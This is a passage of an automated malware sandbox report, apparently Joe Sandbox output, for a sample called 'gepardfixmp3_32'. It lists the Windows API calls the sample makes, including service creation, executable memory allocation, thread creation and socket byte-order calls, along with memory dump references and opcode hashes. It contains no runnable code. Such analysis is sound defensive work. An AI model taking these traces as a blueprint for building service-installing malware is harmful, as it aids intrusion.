                                                            • Instruction Fuzzy Hash: 13B09230748202E9E1801AD00E0DB22144C4704708F30057F2E0BB00C28579415AA82F
                                                            APIs
                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                              • Part of subcall function 00403EAC: GetVersionExA.KERNEL32 ref: 00403ECB
                                                            • HeapDestroy.KERNEL32 ref: 00404044
                                                              • Part of subcall function 004043CB: HeapAlloc.KERNEL32(00000000,00000140,0040402D,000003F8), ref: 004043D8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                            • String ID:
                                                            • API String ID: 2507506473-0
                                                            • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                            • Instruction ID: b1684c5e0161eeb02f30399066ba6d75b4260e35b9d13e26dc8fbe5d47634710
                                                            • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                            • Instruction Fuzzy Hash: F5F092F0656301DAEB301B75AE46B3A39949BC0796F20443BF740F91E1EF7C8481960D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpi
                                                            • String ID:
                                                            • API String ID: 1586166983-0
                                                            • Opcode ID: 7b95b86c1aaae76557b85c0c5d92297faec9ad35c6bb66c8fb573692c9fad8b2
                                                            • Instruction ID: 5b5cc1b84bfbd13785396da11d244059aa66e4d9d7a0a701cb6b82eb384d2618
                                                            • Opcode Fuzzy Hash: 7b95b86c1aaae76557b85c0c5d92297faec9ad35c6bb66c8fb573692c9fad8b2
                                                            • Instruction Fuzzy Hash: 65D05EB0A05603EAE7013F624E5C62A6620BF05781721483FE843F12D2DB7CC009956D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c5a000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 3e80e37952a0d0fa532dcc11c2f87991b5f9bacc7f78a8d170c02bfd5db473b2
                                                            • Instruction ID: 8a1b5050eaf0f88e130ad2275b9cd81a78770ce5c409f674b3461cf6fa88145e
                                                            • Opcode Fuzzy Hash: 3e80e37952a0d0fa532dcc11c2f87991b5f9bacc7f78a8d170c02bfd5db473b2
                                                            • Instruction Fuzzy Hash: E251A1F291C610AFE7057F19EC816BABBE4EF98720F06492EE6C583340E6759841C797
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c5a000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 2cb2b307c7aae38e621b3d23f29f066d1c5bd3e9c593d139109013078efc7ce5
                                                            • Instruction ID: d745173eaeb8997ba654b04b67b2eacebae017ca2b44f0e9798ac77fe4e9a772
                                                            • Opcode Fuzzy Hash: 2cb2b307c7aae38e621b3d23f29f066d1c5bd3e9c593d139109013078efc7ce5
                                                            • Instruction Fuzzy Hash: 653129F291C6109FE7057F09D88567ABBE8EF48710F06492EE6C587340D6755880CBD7
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 0ea362cad60fd070530649c31ae2e31c6497b77e3be6b2cf7ca6b83695ebe0d5
                                                            • Instruction ID: f7a44514bbb95fdb368442dd1dbaed31c78ff441e810e987b5ec8e7ed48db10e
                                                            • Opcode Fuzzy Hash: 0ea362cad60fd070530649c31ae2e31c6497b77e3be6b2cf7ca6b83695ebe0d5
                                                            • Instruction Fuzzy Hash: 32F0E935C591814BC30147B8BE659E13BA2958277434883B7D197932F3D278884FD70D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 1b3a8311a9f96e6514b7a4118f0ebf00ec93b3056256b223f6b9fec65fee9007
                                                            • Instruction ID: a62feb15812f266d1f821792cf3f24bd0c9d9da0839f687d083b1a8415472aec
                                                            • Opcode Fuzzy Hash: 1b3a8311a9f96e6514b7a4118f0ebf00ec93b3056256b223f6b9fec65fee9007
                                                            • Instruction Fuzzy Hash: BFF0E236D10201CFDB10DF98C4C06A633A0BB09304BA00177EC52EB294E738DC484A85
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c5a000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 5f8c1e67a6a1610806ad6bfc478492183e6dbdf0dc868aa61d81953658cd6f19
                                                            • Instruction ID: ddf4b2bc0758e5ee7fa57006d5a9f53efa485c163e379c6721f398cd9f4d1cc2
                                                            • Opcode Fuzzy Hash: 5f8c1e67a6a1610806ad6bfc478492183e6dbdf0dc868aa61d81953658cd6f19
                                                            • Instruction Fuzzy Hash: 92F08C7185D724DBE309AE15E85527AB7B8EB04750F018A2EEAC363680DF755480CBDB
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c5a000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 130fef24ef443a0f68c3e3760ebff47975a3bd019b7889fc0d68414165803614
                                                            • Instruction ID: 6167dc32e15324ce36dc42e753cbe0ccce9121331dd50439b083eb4d794a1a7e
                                                            • Opcode Fuzzy Hash: 130fef24ef443a0f68c3e3760ebff47975a3bd019b7889fc0d68414165803614
                                                            • Instruction Fuzzy Hash: 92E015F280C200ABD315BA45EC82B7ABBE8EB44310F05482CE28582740EA359814CADB
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c5a000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 5e404e47c0d65b11a31686cf39b0c468eddee70c3d100fcd0cc46a07475800da
                                                            • Instruction ID: 17181d2634af66188b91a3e6da96762e2e445931778da87de5fa164d005df332
                                                            • Opcode Fuzzy Hash: 5e404e47c0d65b11a31686cf39b0c468eddee70c3d100fcd0cc46a07475800da
                                                            • Instruction Fuzzy Hash: 1CD02B7359C708CFF241A8CB9C02376B3ECDF60220F198405D644C2700FA6DD8428AD1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: ManagerOpen
                                                            • String ID:
                                                            • API String ID: 1889721586-0
                                                            • Opcode ID: cbc3a693e13ea1d655673721d115c582ff8b1f798658cdd53add30b156feccfb
                                                            • Instruction ID: 18c83838c76df588d570dfd85afbe79323d925606ce726b0d741a0b06de6246a
                                                            • Opcode Fuzzy Hash: cbc3a693e13ea1d655673721d115c582ff8b1f798658cdd53add30b156feccfb
                                                            • Instruction Fuzzy Hash: A7C08CA280D007EEC6C06B800BBC47A309D2128305370893F9607B01D4C1BC040BBC3F
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: a9bfb1fd4438ba23cb2cbd21c85cd703361999a15df3531cf4a295359166527e
                                                            • Instruction ID: bc2ade3b4e38edfd92ee8c1022c6194c23e153e95d850514fe0006698d3f3312
                                                            • Opcode Fuzzy Hash: a9bfb1fd4438ba23cb2cbd21c85cd703361999a15df3531cf4a295359166527e
                                                            • Instruction Fuzzy Hash: C3C080F5D10410CBD7001794993979A7771F715304F654057C101743C1D634443AD64E
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: e3181b256580e8b74a600cd0a985ccf87316c6c4390c3cae83aede39be017ad2
                                                            • Instruction ID: 6e140e4fe17bf4ca05cf37ed8c94f29a87cd131aad5f90e4cdd60544055ad2a6
                                                            • Opcode Fuzzy Hash: e3181b256580e8b74a600cd0a985ccf87316c6c4390c3cae83aede39be017ad2
                                                            • Instruction Fuzzy Hash: 1BC01230E0C105DAD7044ED0CA082793A746704304F214A779517B41C0D3FD804F6D2F
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory
                                                            • String ID:
                                                            • API String ID: 4241100979-0
                                                            • Opcode ID: c6df0f9663803ae7009a7c752f2d2830f6419a1e776777814f0b36e212e63c5e
                                                            • Instruction ID: 9763df5f4b6ba7076b17f1d4c1b4bd2e04aa802739fd7d8154f683bd7cc6e8c3
                                                            • Opcode Fuzzy Hash: c6df0f9663803ae7009a7c752f2d2830f6419a1e776777814f0b36e212e63c5e
                                                            • Instruction Fuzzy Hash: B5B09B65459110D1C70567C14A1DC69B62C69543407604537B946741E267B94406577F
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CopyFile
                                                            • String ID:
                                                            • API String ID: 1304948518-0
                                                            • Opcode ID: 54abb121ac7da1860d3f0afc5a01b932f95f7e72c7af4c5af121dbb86786b387
                                                            • Instruction ID: fbed31e2fef255a47437422b09c431f0b28d86ac8834cadcbbac02a017382091
                                                            • Opcode Fuzzy Hash: 54abb121ac7da1860d3f0afc5a01b932f95f7e72c7af4c5af121dbb86786b387
                                                            • Instruction Fuzzy Hash: 009002352041019AD2001A215B4C615776855046C131585796547E0090DA74808D6619
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 4159485ffb4b8cf04d68ffc6e2cd42774685805fd72d4d3b7047257a3e08a4cc
                                                            • Instruction ID: 673711826bf30427439247b1ec9b5956d4062ea118963f6979d00cfc52e472f8
                                                            • Opcode Fuzzy Hash: 4159485ffb4b8cf04d68ffc6e2cd42774685805fd72d4d3b7047257a3e08a4cc
                                                            • Instruction Fuzzy Hash: 5B90027656551096C24017505B1D9153654715870133181376342710E19AF9540A561E
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c5a000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: ba00af2ba38a8d34c05101d7555d85534b131f58652fd3c305f2c41b97bdeb58
                                                            • Instruction ID: 68635f6be95931a1459388dad3989a999853f784d9c6d7d08b1551a533b86ad8
                                                            • Opcode Fuzzy Hash: ba00af2ba38a8d34c05101d7555d85534b131f58652fd3c305f2c41b97bdeb58
                                                            • Instruction Fuzzy Hash: 3AF031B2508204EBD3113A09EC45BFEFBE5EB95720F05052DE7D402600E6365514DA97
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,0040909C), ref: 0040D613
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 290c61bfec4f9be9f13626f948c3d57be8bfbf2a9a50b76bc2e5c1e9e57d57af
                                                            • Instruction ID: ab747c884e3dd0d9f57e62df985716445cbd6f240b1931aaa6a3d7f758cf66be
                                                            • Opcode Fuzzy Hash: 290c61bfec4f9be9f13626f948c3d57be8bfbf2a9a50b76bc2e5c1e9e57d57af
                                                            • Instruction Fuzzy Hash: 1FE02232904300FBD6101A648D45F823BAAA744B40F210039BF0A3B1C2C7B9AC2E96DA
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: a0bb40b6132028b71b004a50573e695a573b5c0026675c985bf9518746cd1e99
                                                            • Instruction ID: f726ec03bab0663b015214a05118fc60bcdaae40a429550eedbcf79851c31657
                                                            • Opcode Fuzzy Hash: a0bb40b6132028b71b004a50573e695a573b5c0026675c985bf9518746cd1e99
                                                            • Instruction Fuzzy Hash: 5FC02230C00B02F7C3011BD09948165BB103F10302BA1020AC483120C0C725106E9B8B
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 40865995133f64224b908a136195b6cbba00916b455cc0fe157855fee577e420
                                                            • Instruction ID: 9ef63143a83fc572421e023fef3a70a1d039927a1c0585138bfae8dd5e26215d
                                                            • Opcode Fuzzy Hash: 40865995133f64224b908a136195b6cbba00916b455cc0fe157855fee577e420
                                                            • Instruction Fuzzy Hash: 76900221544A1196D20016A06B0DB2435107344701F15416F6242640D059B50047560A
                                                            APIs
                                                              • Part of subcall function 02C29ADD: __EH_prolog.LIBCMT ref: 02C29AE2
                                                              • Part of subcall function 02C29ADD: _Allocate.LIBCPMT ref: 02C29B39
                                                              • Part of subcall function 02C29ADD: _memmove.LIBCMT ref: 02C29B90
                                                            • _memset.LIBCMT ref: 02C30949
                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C309B2
                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C309BA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                            • String ID: Unknown error$invalid string position
                                                            • API String ID: 1854462395-1837348584
                                                            • Opcode ID: f34be7f6648a949628257c401daef45941a83fd7657dbc8ec58d33841170a5a6
                                                            • Instruction ID: 590f72c498f7d6e33ef34d7e216bf5e8bee644230948ecb9e668140cc0069381
                                                            • Opcode Fuzzy Hash: f34be7f6648a949628257c401daef45941a83fd7657dbc8ec58d33841170a5a6
                                                            • Instruction Fuzzy Hash: 4551BA716483408FE715CF25C890B2FBBE4AB98748F500D2DF49297691DB71E688CF92
                                                            APIs
                                                            • CreateServiceA.ADVAPI32 ref: 0040222D
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 0040223E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: Service$CloseCreateHandle
                                                            • String ID:
                                                            • API String ID: 1873643653-0
                                                            • Opcode ID: 140a6aa7e0ef26ac6d544f5a2e87588dd583c6a3b2d21fcb41c15f2786c2070e
                                                            • Instruction ID: e3be706b152cb66e602898dc912b814dac0406c8c16bf4bcce591970d9b6ae89
                                                            • Opcode Fuzzy Hash: 140a6aa7e0ef26ac6d544f5a2e87588dd583c6a3b2d21fcb41c15f2786c2070e
                                                            • Instruction Fuzzy Hash: 98C01230844000DBCE242F909F0C8293639979031032180B9E846B21E4CB389D1EF65D
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C34EA6,?,?,?,00000001), ref: 02C3953D
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C39546
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 518a72844ff1d60cddf04aa356e26a4f98107dbb94a0012ab160f8d1580deca9
                                                            • Instruction ID: fcf83d2b8f6bb9a860786bc12a65caea50a1c216adfd926fcfd12760189ba9f3
                                                            • Opcode Fuzzy Hash: 518a72844ff1d60cddf04aa356e26a4f98107dbb94a0012ab160f8d1580deca9
                                                            • Instruction Fuzzy Hash: 31B09239486208EBCB012B91FC0DB8ABFA8EB04662F004D10F60E440508B6264289AE1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID:
                                                            • API String ID: 2102423945-0
                                                            • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                            • Instruction ID: 05393cb809f28d7bc92b6471849fea07260fedf37bea69443f741d3894c5591a
                                                            • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                            • Instruction Fuzzy Hash: 7CF082B590430DAAD714DF99D942B8DFBB8FB44314F208169D50CA7340E6B17A158B94
                                                            APIs
                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D64C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: CtrlDispatcherServiceStart
                                                            • String ID:
                                                            • API String ID: 3789849863-0
                                                            • Opcode ID: f334230a123109bc986c79b684bfc241b6ed8d84c8b9ca1e9b781c49fb08c2fe
                                                            • Instruction ID: 33bf815d9ae8fe64f49f70d87103aad67953c997e0f065a5522159dccca50146
                                                            • Opcode Fuzzy Hash: f334230a123109bc986c79b684bfc241b6ed8d84c8b9ca1e9b781c49fb08c2fe
                                                            • Instruction Fuzzy Hash: 26B01270808004DAC70057C08D048B8322CBA0D301B110436D10FB0042C638500D9E3B
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D11
                                                            • GetLastError.KERNEL32 ref: 02C21D23
                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D59
                                                            • GetLastError.KERNEL32 ref: 02C21D6B
                                                            • __beginthreadex.LIBCMT ref: 02C21DB1
                                                            • GetLastError.KERNEL32 ref: 02C21DC6
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C21DDD
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C21DEC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C21E14
                                                            • CloseHandle.KERNEL32(00000000), ref: 02C21E1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                            • API String ID: 831262434-3017686385
                                                            • Opcode ID: 0afe7f37f8dbeda263074d3217d3eeccefce3ce1faf5092a820fc317deb40e3f
                                                            • Instruction ID: 3a83e54dd07434b3e7c1af95055f3e61d9cb37fd85b0dc02a81f0bda1aea67ca
                                                            • Opcode Fuzzy Hash: 0afe7f37f8dbeda263074d3217d3eeccefce3ce1faf5092a820fc317deb40e3f
                                                            • Instruction Fuzzy Hash: FB31AB759003109FD701EF24C848B2BBBE9EB84714F144A6DF8598B291EBB0AD49CFD2
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C224E6
                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C224FC
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C2250E
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2256D
                                                            • SetLastError.KERNEL32(00000000,?,7622DFB0), ref: 02C2257F
                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7622DFB0), ref: 02C22599
                                                            • GetLastError.KERNEL32(?,7622DFB0), ref: 02C225A2
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C225F0
                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02C2262F
                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C2268E
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C22699
                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C226AD
                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7622DFB0), ref: 02C226BD
                                                            • GetLastError.KERNEL32(?,7622DFB0), ref: 02C226C7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                            • String ID:
                                                            • API String ID: 1213838671-0
                                                            • Opcode ID: a08488f90cc7e94ae39fcd213eb0d10de9a8cdc86d69cab228a5582012234ac5
                                                            • Instruction ID: 8f729df7bcc4d123f6ab59975f45a6e78d841fc543836b271dad8f4dd6d93b97
                                                            • Opcode Fuzzy Hash: a08488f90cc7e94ae39fcd213eb0d10de9a8cdc86d69cab228a5582012234ac5
                                                            • Instruction Fuzzy Hash: BE6130759012199FCB21DFA4D584AAEFBF9FF48314F104929E916E7240DB34AA18CFA1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C24608
                                                              • Part of subcall function 02C33B5C: _malloc.LIBCMT ref: 02C33B74
                                                            • htons.WS2_32(?), ref: 02C24669
                                                            • htonl.WS2_32(?), ref: 02C2468C
                                                            • htonl.WS2_32(00000000), ref: 02C24693
                                                            • htons.WS2_32(00000000), ref: 02C24747
                                                            • _sprintf.LIBCMT ref: 02C2475D
                                                              • Part of subcall function 02C28990: _memmove.LIBCMT ref: 02C289B0
                                                            • htons.WS2_32(?), ref: 02C246B0
                                                              • Part of subcall function 02C2973B: __EH_prolog.LIBCMT ref: 02C29740
                                                              • Part of subcall function 02C2973B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C297BB
                                                              • Part of subcall function 02C2973B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C297D9
                                                              • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                              • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                              • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                              • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                              • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                              • Part of subcall function 02C2DEF7: __EH_prolog.LIBCMT ref: 02C2DEFC
                                                            • htonl.WS2_32(?), ref: 02C2497C
                                                            • htonl.WS2_32(00000000), ref: 02C24983
